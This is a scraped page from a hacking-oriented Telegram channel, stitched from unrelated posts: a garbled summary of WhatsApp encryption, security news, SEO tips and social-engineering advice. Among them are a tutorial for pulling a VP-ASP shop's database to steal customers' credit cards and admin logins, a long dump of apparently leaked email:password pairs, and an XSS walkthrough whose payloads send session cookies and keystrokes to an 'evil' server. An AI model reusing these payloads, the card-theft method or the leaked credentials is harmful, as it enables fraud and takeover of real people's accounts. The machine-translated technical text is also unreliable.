UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.4K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
Xd DIm to get free
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘WhatsApp general encryption Lastest Update 2019- 2020 by UndercOde
Twitter.com/UNDERCODETC

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ

1) Types of public key

> Identity key pair - Long-term Curve25519 key pair,
generated during installation.

2) Signed Pre Key - A medium term Curve25519 pair of keys,
generated during installation, signed by the identity key, and rotated
on a periodic timed basis.

3) A pre-Keys time - a queue of key pairs for a Curve25519
using the time, generated during installation, and replenished as necessary.

๐Ÿฆ‘ Session Key Types

> Root Key - A 32-byte value that is used to create string keys.

>Keychain - A value of 32 bytes that is used to create
Keys messages .

>Key Message - A value of 80 bytes that is used to encrypt
content messages . 32 bytes are used to obtain an AES-256 key, 32 bytes for an
>HMAC-SHA256 key, and 16 bytes for an intravenous injection.

๐Ÿฆ‘client registration

1)At the time of registration, a WhatsApp client transmits its public identity
Key, public key signed Pre (with its signature), and a public batch
A time of pre Keys for the server.

2) The server stores these WhatsApp
public keys associated with the user ID. In no time the
WhatsApp server has access to any of the clients private keys.

๐Ÿฆ‘To establish a session:

1) The client that starts ("initiator") requests the public key identity,
previously signed public key, and a single one-time public Pre key
for the recipient.

2) The server returns the requested public key values. Once
Pre Key is only used once, so it is removed from server storage
after it has been requested. If the recipient's last batch of one-time
Pre keys has been consumed and the recipient has not replenished
them, they will be returned without a single key time previously.

3) The initiator saves the recipient's Key Identity as Irecipient, the
Pre Key Sign as Srecipient, and the one-time as Pre
Orecipient Key .

4) The initiator generates an ephemeral Curve25519 key pair, Einitiator.

5) The initiator loads its own identity key as Iinitiator.

6) The initiator calculates a master secret as master_secret =
ECDH (Iinitiator, Srecipient) || ECDH (Einitiator, Irecipient) ||
ECDH (Einitiator, Srecipient) || ECDH (Einitiator, Orecipient).
If there is no pre Key time, the final ECDH is skipped.

7) The initiator uses HKDF to create a string root key and
master_secret keys .
Receiving session configuration
After the construction of a long-term encryption session, the initiator can immediately

8) start sending messages to the recipient, even if the recipient is not online.
Until the recipient responds, the initiator includes the information (in the
header of all sent messages) that the receiver requires to build a corresponding
session. This includes Einitiator of the initiator and Iinitiator.
When the recipient receives a message that includes session

@UndercOdeTestingOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘TUTORIAL HACKING CART BUY AND GET CREDITCARD Semi-patched for 60% of 2019 Websites for TestingOnly
instagram.com/UnderCodeTestingCompany

>CC (credit cards) can be hacked in two ways: โ€ข Credit card scams (generally used to earn money, sometimes for shopping) โ€ข Shopadmin Hacking credit card (just for fun, knowledge, shopping on the Internet) Shopadmin hacking

> This method by undercode is used to test knowledge or to obtain a credit card to buy on the Internet, or to have fun, or any way but not to charge (because this method does not give PIN - 4-digit code) only gives cc numb, cvv2 and other basic information.

> Shopadmins are from different companies, such as: VP-ASP, X CART, etc. This tutorial is for Testing VP-ASP SHOP to protect your cc

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ

1) I hope or seen when u try to buy something on the Internet with cc, which show u a well programmed, very safe way.

> They are carts, like xcarts vp-asp. Specific sites are not hacked, but cars are hacked. Next, I am publishing tutorial for VP ASP hack cart. Now all the sites that use that cart can be hacked, and through their * mdb file u can get the details of their customers credit card, as well as the login name and password of their administration area and All other customer information and comapny secrets.

2) Type: VP-ASP Shopping cart version 5.00

3) How to find VP-ASP 5.00 sites?

4) Finding VP-ASP 5.00 sites is so simple ...

1-Go to google.com and type: VP-ASP Shopping Cart 5.002. You will find many websites with VP-ASP 5.00 software cart installed.


2-Now we go to the feat.


5) The page will be like this: **: //*.victim.com/shop/shopdisplaycategories.asp The exploit is: diag_dbtest .aspNow you need to do this: **: // *. Victim.com/shop/diag_dbtest.asp

6) A page will appear containing: โ€ข xDatabase โ€ข shopping140 โ€ข xDblocation โ€ข resx โ€ข xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r Example:

7) The most important thing here is xDatabasex40 Data Base

: *: //***.victim.com/shop/shopping140.mdb

8) If you did not download the database, try this while there is dblocation: xDblocationresxthe the url will be: **: //*.victim.com/shop/resx/shopping140.m

USE FOR LEARN NOT FOR SPY๐Ÿ’€

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘WINDOWS 7 ALL VERSION BYPASS LINKS BY UNDERCODE 2020
t.me/UndercOdeTesting

>No-Need for Product Key To Download from Microsoft

๐Ÿฆ‘ X64 ALL:

> https://download.microsoft.com/download/5/1/9/5195A765-3A41-4A72-87D8-200D897CBE21/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x64FRE_en-us.iso

๐Ÿฆ‘X32 ALL:

> https://download.microsoft.com/download/1/E/6/1E6B4803-DD2A-49DF-8468-69C0E6E36218/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x86FRE_en-us.iso


For More DM
@UndercOdeTesting

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ALL Possible Uses Of Spoofing ?
Twitter.com/UndercOdeTC

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ

1) Guessing your email password (seems unlikely, but you would be surprised how simple many email passwords are, such as birthdays, anniversary dates, and other information easily obtained on social media)
Answering your security questions correctly

2) You entered it into a website or form (it may have been a phony website, one that offered you a free gift, or a site you visited from a link in an email)

3) You used the same password on a different site and the site used it to access your email

4) You have a spyware program on your computer that recorded you typing in your password and sent it to a hacker

5) Viruses, malware or other undesirable software is on your computer and allowed a hacker to get your email password

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Twitter profile dumper (downloader) with authorization swapping:
>Tweetlord is an open source Twitter profile dumper (downloader) with the on-the-fly account swapping support for bypassing the rate limit restrictions. It is written in Python 3, uses the Twitter API and generates .xlsx files at the output containing comprehensive information about the given profile #2019 Tested
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/snovvcrash/tweetlord

2) cd tweetlord

3) now set your API keys in the credentials.py file for every Twitter account you want to involve in the procedure

4) If a mistake is made when filling the credentials, the script will terminate with an unhandled tweepy exception

๐Ÿฆ‘Running :

>tweetlord.py [-h] (-u USER | -l) [-fr FRIENDS] [-fo FOLLOWERS]
[-fa FAVORITES] [-ti TIMELINE] [-o OUTPUT] [-w] [-e] [-d]

required arguments:
-u USER, --user USER set the user profile you want to dump: <USER> could be a screen name or an account ID (if it is an ID, you should start the string with the "id" prefix, e. g. "id859377203242426368")
OR
-l, --show-limits show the rate limit status (total โ†’ remaining โ†’ time_to_wait_till_reset) for each of the accounts you set when configuring the tool

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘What to do if your Email is HACKED ?
t.me/iOsDeveloppers

> Check your recent email activity to see if anything was sent that you were not aware of

>Change your password

> Commit to Multi Factor Authentication
Yes, multi-factor authentication adds another step to your login but it also adds another layer of protection. Enabling this will mean that in addition to your password, you will need a special one-time use code to login. This is usually sent to your mobile phone

>Use different passwords for every account

>Start using a password manager to generate random, complex passwords

> Update your system to the latest OS and update your security software

> Change Your Security Question

>Run your antivirus and malware detection programs

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘NGINX Unit 1.14.0 Application Server Release 2019 Corrective update nginx
and gives many features :
Instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ


1) Now you can route requests to addresses and port numbers of the source and destination.

2) Added support for changing the user and group for isolated applications in the conditions when the background process of the Unit is running as an unprivileged user.

3) The name for importing packages in Go is changed to "unit.nginx.org/go" (to install a module for Unit, you can use the command "go get unit.nginx.org/go").

4) When building packages, Go packages now bind to libunit.

5) Reduced memory consumption when processing very large responses.

6) Updated An environment image for the Docker system, allowing you to quickly deploy a solution based on the NGINX Unit. The stuffing of the image is transferred from Debian 9 to Debian 10;

7) Repositories for CentOS and RHEL 7 added packages with modules for Python 3.6. Python 3.7 packages added for Amazon Linux 2 LTS. Packages for Python 2.7 are renamed from "unit-python" to "unit-python27"

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Big Collections Of Exploite Python & Bash include bug bounty :
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ

>Updated 2019
https://github.com/1N3/Exploits
๐Ÿฆ‘Include :

> Vulnserver.exe GMON SEH Overflow Exploit

> FreeFloat FTP Server HOST Buffer Overflow (ASLR Bypass)

> CoolPlayer+ Portable 2.19.6 Stack Overflow (ASLR Bypass)

> HTTPoxy Exploit/PoC Scanner

> Ability FTP 2.34 Buffer Overflow Exploit

> Aruba AP-205 Buffer Overflow Denial of Service PoC

> Brainpan1 CTF Buffer Overflow Exploit

> CesarFTP 0.99g Buffer Overflow Exploit

> Apache 2.2.x Range Header Denial of Service Exploit

> GHOST Glibc Gethostbyname Buffer Overflow Exploit

> PHP Serialization Injection Remote Code Execution Exploit

> CrikeyConCTF Koala Gallery Exploit

> Webmin 1.920 Unauthenticated RCE Metasploit Exploit

E N J O Y

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
nefritz1919@gmail.com:hockey19 | US | 13/01/2020
jeff@leedesignsllc.com:Whitey64 | US | 25/01/2020
bizzyboneternal@yahoo.com:7thsigns | US | 07/01/2020
ecxset@gmail.com:Setsuna13 | US | 18/03/2020
chillyoinc@hotmail.com:Production1 | CA | 04/01/2020
slavatyn@gmail.com:Uvn007007 | LV | 20/03/2020
chris8andahalf@hotmail.com:briana421 | US | 30/01/2020
Kellybeck100@gmail.com:Ebonie2005 | GB | 05/01/2020
itsalwaysmoody@gmail.com:f0stero03 | US | 10/01/2020
farrel.benton@gmail.com:xsw21qaz | US | 14/03/2020
heatherwhitcraft@yahoo.com:mama7mia | US | 20/01/2020
yuval123g@gmail.com:y070798y | IL | 08/01/2020
tlkeltner@yahoo.com:Sweetpete09 | US | 15/01/2020
zicc1@bigpond.com:Summer76 | AU | 22/01/2020
louise_birch4@hotmail.com:Louise0501 | DK | 13/01/2020
wendland010174@aol.com:wendy74 | DE | 08/02/2020
rockyjspencer@yahoo.com:yellowhair | US | 04/01/2020
jadetomlinson187@hotmail.co.uk:W1056187 | GB
rhys.piper@hotmail.com:Maga2010 | GB | 21/01/2020
ayottepatrick@hotmail.com:Ninpat64 | CA | 30/01/2020
naomi.a_05@hotmail.co.uk:Pondkite1 | GB | 13/01/2020
ruthiejewell@hotmail.com:Jewell11 | US | 17/01/2020
susan_mccabe@hotmail.com:T4mm7h00p5 | GB | 30/01/2020
j-didier@hotmail.com:Jessmaedid5 | CA | 02/02/2020
dou_power@hotmail.com:Upendi14 | CA | 28/01/2020
pvanderwalle@hotmail.com:Benson1953 | US | 09/01/2020
reneejustice@live.com.au:Ally1979 | AU | 10/01/2020
noelsuza@hotmail.com:Malcolm1 | US | 10/01/2020
JOANNACGORDON@HOTMAIL.COM:Michael123 | GB | 30/01/2020
kathleen_mburns@hotmail.com:Chapstick99 | US | 28/01/2020
sophie_elizabeth_ann@hotmail.com:Ijlmm667 | GB | 07/01/2020
amyb25@msn.com:Xander18 | US | 15/01/2020
royaltyatitsbest@yahoo.com:Chocolate22 | US | 10/01/2020
arch.donnarabe@gmail.com:_messiah07_ | PH | 02/02/2020
rshaeeda@yahoo.com:Asontai04 | US
mrush0513@gmail.com:sephora1 | US | 16/01/2020
cheryldixon144@hotmail.com:Hollieann1 | GB | 06/01/2020
texas.made.2009@gmail.com:Pepper09 | US | 26/02/2020
rocivaz@gmail.com:37942006 | ES | 27/01/2020
z.schlichter@gmail.com:wissota1 | US
stevenarodas@gmail.com:1Taukappa | US | 31/01/2020
missykrissy66@gmail.com:ing3ni0us | US | 01/02/2020
talk2me9ad2@hotmail.com:Jonathon1 | US
ryan.mcguire@baruchmail.cuny.edu:033188 | US | 23/01/2020
carastan0827@gmail.com:Flower77 | US | 13/01/2020
reneemaxwell@icloud.com:KickLow420 | US | 13/01/2020
cassieblue@live.co.uk:belgrave14 | GB
caroline_griz@hotmail.com:Pink0909 | GB | 12/01/2020
barb.mil@bigpond.net.au:Passw0rd | AU | 12/01/2020
prd74@live.com:Esteban1011974 | GB | 24/01/2020
ally-82@live.com.au:Amy19ally23 | AU | 16/01/2020
clintwalker@dslextreme.com:Monster24 | US | 08/01/2020
chelsealund86@hotmail.com:Henrietta1 | GB | 31/01/2020
tracie@idahokravmaga.com:1234ndcq | US | 11/01/2020
keryndavidson@hotmail.com:Davids0n | GB | 26/01/2020
weaslyisking@gmail.com:tiger38grey | US
kam96vt@gmail.com:5anibelI | US | 06/01/2020
fiona.wallace@live.com.au:Samuel71 | AU | 05/01/2020
seanandrewwilson@gmail.com:matiesse1 | AU | 24/01/2020
bethan113@hotmail.com:Chris1988 | GB | 26/01/2020
zoe.brew@mail.com:Socrates1 | GB
chmkstaff@yahoo.com:1fatkitty | US | 05/01/2020
doublejoe2002@gmail.com:Joethegamer | US | 29/02/2020
lcreddevils1@gmail.com:Govols93 | US | 17/01/2020
Tess_Leary@hotmail.co.uk:90210Shoes | AU | 11/01/2020
keviscool0110@hotmail.com:idontknow11 | US | 26/01/2020
laura-downie@hotmail.co.uk:Robmaya2697 | GB | 09/01/2020
rebeccabarcas@hotmail.co.uk:Smudger14 | GB | 24/01/2020
chippythesquirrel.weeter155@gmail.com:chippy101 | US | 25/01/2020
torytalk@hotmail.com:Banana1984 | GB | 22/01/2020
dmoor71@gmail.com:showboat | US | 18/01/2020
shanepockrus@yahoo.com:1234QWERasdf | US | 23/01/2020
fallowsmark@hotmail.com:Jameson11 | GB | 12/01/2020
theo638@gmail.com:papillon789 | FR | 29/01/2020
s.welton@hotmail.co.uk:Rebekah5 | GB | 24/03/2020
jpcrussell13@gmail.com:19Theronks | IE
naptownq70@gmail.com:football70 | US | 29/01/2020
ocaranza@gmail.com:chupalo1 | CL | 20/01/2020
fashiondiva16@gmail.com:Princess1996 | US | 11/03/2020
lisasosey@gmail.com:2boysmom | US | 01/02/2020
clara.casey96@hotmail.co.uk:Kittens96 | GB | 17/01/2020
kathrynlouiseneild@hotmail.com:Lateshop1 | GB | 03/01/2020
smeek100@hotmail.com:Samboss1 | GB | 25/01/2020
vicky_l_859@hotmail.com:Swaykano2006 | GB | 13/01/2020
larad123@hotmail.com:Theresa123 | GB
sofyjean@hotmail.com:Millie9493 | AU | 27/01/2020
unclined@gmail.com:soundead1 | US | 27/01/2020
charlotte2walkies@yahoo.co.uk:Leojoe85 | GB | 17/01/2020
wadebm25@att.net:Coolstuff1 | US | 14/01/2020
taracutler@gmail.com:blueb3028 | US | 22/01/2020
souadhaddouch@hotmail.com:Younes76 | GB
bheeren2000@yahoo.com:doni1995 | US
ellenfreitag@hotmail.com:Sally2004 | AU | 29/01/2020
drektegek@hotmail.com:Bikkel01 | NL
kate_basset@hotmail.com:Malinda503 | AU | 01/02/2020
cstill20@hotmail.co.uk:Freya314 | GB
mufckeane@googlemail.com:Sophie12 | GB
adesersa@gmail.com:July292011 | US | 17/03/2020
bwneyes@hotmail.com:Mi2kings | US | 02/02/2020
sarahhillstead@hotmail.co.uk:Priday1898 | NL | 03/01/2020
lanhuashu1919@hotmail.com:lanhuashu1125109 | US | 18/01/2020
dani9000@yahoo.com:jackrabbit24 | US | 05/01/2020
kevin.hansen@gmx.de:wow3489032 | DE | 24/02/2020
kirstenquirke@live.co.uk:Redflower1 | IE | 25/01/2020
nicholascoons94@gmail.com:Godofwar27 | US | 15/01/2020
waters.bd@gmail.com:Fruity11 | VN
duggie12@live.com:zagreb12 | GB
mcnuggets719@gmail.com:Dooley5066 | US
tomkins.tina@googlemail.com:Cha1rlie | GB | 13/01/2020
pamela.lawson1983@hotmail.co.uk:cuthill1 | GB
ppepsi925@outlook.com:tinker9bell | US | 26/01/2020
Fabianviel@hotmail.com:Spookhuis1 | NL
lucie_hopkins@hotmail.com:pepsi123 | GB
demarcospizza1@yahoo.com:Pizza2005 | US | 18/01/2020
talia.ziskroit@gmail.com:taliaz | US
lucyg90@hotmail.com:Patsyg90 | AU | 20/01/2020
kennypulliam@gmail.com:virgil89 | US | 04/01/2020
olivia52@sky.com:Gymnastics13 | GB | 12/01/2020
clarkity@comcast.net:Mcm11395 | US | 19/01/2020
kelleykilmer@gmail.com:Momrocks | US | 13/01/2020
sue_shirley@hotmail.co.uk:suzanne25 | GB | 14/01/2020
sshephardmca@gmail.com:Bear2013 | US | 16/01/2020
chrystianrk@gmail.com:pookie03 | US | 23/01/2020
louise.lyons@hotmail.com.au:Cnfnvyq4 | GB | 09/01/2020
paulineriddeal@googlemail.com:Sunningdale1 | GB | 15/01/2020
justinplatten4@live.com.au:Legend69 | AU | 12/01/2020
matthew.d.haines@gmail.com:daysaway1 | US | 24/01/2020
scottymctoddy@gmail.com:repower1 | US | 21/01/2020
xplubaluba@gmail.com:xp64929929luba | GB | 05/01/2020
anne.hatten@bigpond.com:11Mikayla11 | AU | 26/01/2020
doml_93@hotmail.co.uk:ballon12 | GB | 28/01/2020
frank.r.carillo@gmail.com:honeyluva | US | 24/01/2020
JonVollman40@Gmail.com:06272001 | US | 05/03/2020
x.daniellej.x@hotmail.co.uk:Corky101 | GB | 10/01/2020
deborahnakache@hotmail.fr:mazaltov1983 | FR
heatherwilkinson1@msn.com:Chocolate917 | CA | 24/01/2020
sharon_windeatt73@hotmail.com:Monte166 | GB
msescarcega@gmail.com:bonita911 | US | 30/01/2020
rfsundevil@hotmail.com:Rfitz6303 | US | 16/01/2020
greendragon_1986@hotmail.com:Tortoise816 | GB | 05/01/2020
dafna.revah@gmail.com:Israel1948 | US | 21/03/2020
joshsummers9@gmail.com:bubbler2 | US
alexgroombridge@hotmail.com:Alex1988 | AU | 02/04/2020
wsloan99@hotmail.com:budapest06 | US | 13/01/2020
laurajleach@hotmail.co.uk:Charlpike1 | GB | 04/01/2020
samanez.katia@gmail.com:marcelo11 | US
gill-calv@hotmail.com:buster123 | GB | 02/04/2020
ckfellman@gmail.com:fellman | US | 01/02/2020
dsmiles503@gmail.com:mrsjones1 | US | 15/01/2020
teags1987@hotmail.com:kahluaha87 | AU | 23/03/2020
caitlinmckeownkayoko@yahoo.com:@ir43ad!!! | US
clo2k1@hotmail.com:Laguna34 | GB | 17/01/2020
holly_mercieca@hotmail.co.uk:Pascoe01 | GB
scaudle@gmail.com:donkeypower | US | 09/01/2020
hjzweers@hotmail.com:Pa55word31 | NL | 08/01/2020
daniel.chilelli@hotmail.com:sausage1 | AU | 31/01/2020
lanhuashu1919@hotmail.com:lanhuashu1125109 | US | 18/01/2020
rich850210@freemail.hu:Znffgp007 | HU | 16/01/2020
roniekillian@gmail.com:hernandez12345 | IE | 21/01/2020
kaylaw@hotmail.co.nz:Fl0werb0mb | NZ
elbel02@yahoo.com:summer03 | US | 18/03/2020
Spootify premuim
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘XSS vulnerabilities are generally used to steal sensitive information (login credentials, authentication tokens, personal user data) as well as perform actions on behalf of authenticated users.
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

Note : For Windows users, open Git Bash. You will use this program to run all the "terminal" commands you see in the rest of this guide.

For Linux and Mac users, open Terminal.

In your terminal program, use git to download the project:


1) git clone https://github.com/Learn-by-doing/xss.git

If successful, a new folder named xss should have been created.

2) Change directory into the new folder:

> cd xss

3) Install the project's dependencies using npm:

> npm install

4) Now we can run the local web server using Node.js:

> node server.js

5) If successful, you should see the following message: Server listening at localhost:3000. This means that a local web server is now running and is listening for requests at localhost:3000.

6) Open your browser and click the link.

> You should see a simple search form. Enter some text then press enter (or click the "search" button).

7) Open the developer tools in your browser (F12) and open the "Console" sub-tab.

Copy/paste the following code into the console and run it:

encodeURIComponent('<img src="does-not-exist" onerror="alert(\'hi!\')">');

8) Copy the output and paste it into the address bar so that the URL looks like this:

http://localhost:3000/?q=%3Cimg%20src%3D%22does-not-exist%22%20onerror%3D%22alert('hi!')%22%3E


9) Exploitation

Open the "Application" sub-tab in your browser's developer tools. Under "Storage" -> "Cookies", click "localhost:3000" to show the cookies being saved by the browser for this website.

10) Notice how there is a cookie named "connect.sid". This is a session cookie set by our local web server. Is it possible for us to access this via the XSS vulnerability? Let's try. Repeat the steps from the "Proof of Concept" section above, but with the following code:

<img src="does-not-exist" onerror="alert(document.cookie)">

11) Encode the above HTML and use it as the search query, or try this link.

If successful, you should see the contents of the session cookie printed in an alert pop-up.

12) Now before continuing, we will need to start our "evil" web server. Run the following command in a second terminal window:

> node evil-server.js

13) And now try to use the following code with the XSS vulnerability to steal the session cookie:

<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?data=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">

14) Encode the above HTML and use it as the search query, or try this link.

> Check the terminal window of the evil server. Do you see the contents of the session cookie?

15) So now the JavaScript code from the last example in a readable form:

var img = document.createElement('img');
img.src = 'http://localhost:3001/cookie?data=' + document.cookie;
document.querySelector('body').appendChild(img);

16) Now let's get even more nasty. Let's try a key-logger:

<img src="does-not-exist" onerror="var timeout; var buffer = \'\'; document.querySelector(\'body\').addEventListener(\'keypress\', function(event) { if (event.which !== 0) { clearTimeout(timeout); buffer += String.fromCharCode(event.which); timeout = setTimeout(function() { var xhr = new XMLHttpRequest(); var uri = \'http://localhost:3001/keys?data=\' + encodeURIComponent(buffer); xhr.open(\'GET\', uri); xhr.send(); buffer = \'\'; }, 400); } });">

17) Encode the above HTML and use it as the search query

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘What About SEO ? GUIDE:
T.me/UndercOdeTestingOfficial

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ

> The most famous phrase used in SEO is โ€œIt Dependsโ€. It all depends on the type of content, the CMS on which the site is built, the industry in which you are located, etc. But when it comes to SEO for healthcare organizations, โ€œIt Dependsโ€ becomes โ€œIt Matters.โ€

For the most part, the most important driver in SEO is the target audience and its activity

Here are three things to consider when optimizing medical-related sites.

> Important SEO Considerations for Healthcare Sites

1) Mobile First Optimization Above All

2) Multilingualism

3) Optimization for local issuance

๐Ÿฆ‘what about clients:

> Connect your patients to your site

After all, delivering useful, strong content to users

Written by Undercode

โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘SOCIAL ENGENEER ATTACKS
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘What is Social Engineering? & what is the plan in use ?

> Social engineering is the art of manipulating users of a computing system into revealing confidential information that can be used to gain unauthorized access to a computer system.

> The term can also include activities such as exploiting human kindness, greed, and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software.

> Knowing the tricks used by hackers to trick users into releasing vital login information among others is fundamental in protecting computer systems

๐Ÿฆ‘HOW THOSE ATTACKS WORKS ?

1) Gather Information: This is the first stage, the learns as much as he can about the intended victim. The information is gathered from company websites, other publications and sometimes by talking to the users of the target system.

2)Plan Attack: The attackers outline how he/she intends to execute the attack

3) Acquire Tools: These include computer programs that an attacker will use when launching the attack.

4) Attack: Exploit the weaknesses in the target system.
Use acquired knowledge: Information gathered during the social engineering tactics such as pet names, birthdates of the organization founders, etc. is used in attacks such as password guessing.


Written by Undercode
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Social engeneer the expert hacking :Understanding before attack:
twitter.com/UNDERCODETC

๐Ÿฆ‘โ“โ“”โ“ฃโ“ข โ“ˆโ“ฃโ“โ“กโ“ฃ

> Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can;

1) To counter the familiarity exploit, the users must be trained to not substitute familiarity with security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.

2) To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.

3) To counter phishing techniques, most sites such as Yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.

4) To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance.

5) To counter human curiosity, itโ€™s better to submit picked up flash disks to system administrators who should scan them for viruses or other infection preferably on an isolated machine.

6) To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.

Written by Undercode
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚

๐Ÿฆ‘XRay is a tool for recon, mapping and OSINT gathering from public networks.
t.me/iOsDeveloppers

๐Ÿฆ‘FEATURS :

1) It'll bruteforce subdomains using a wordlist and DNS requests.
For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.

2) If a ViewDNS API key is provided, for every subdomain historical data will be collected.

3) For every unique ip address, and for every open port, it'll launch specific banner grabbers and info collectors.

4) Eventually the data is presented to the user on the web ui.

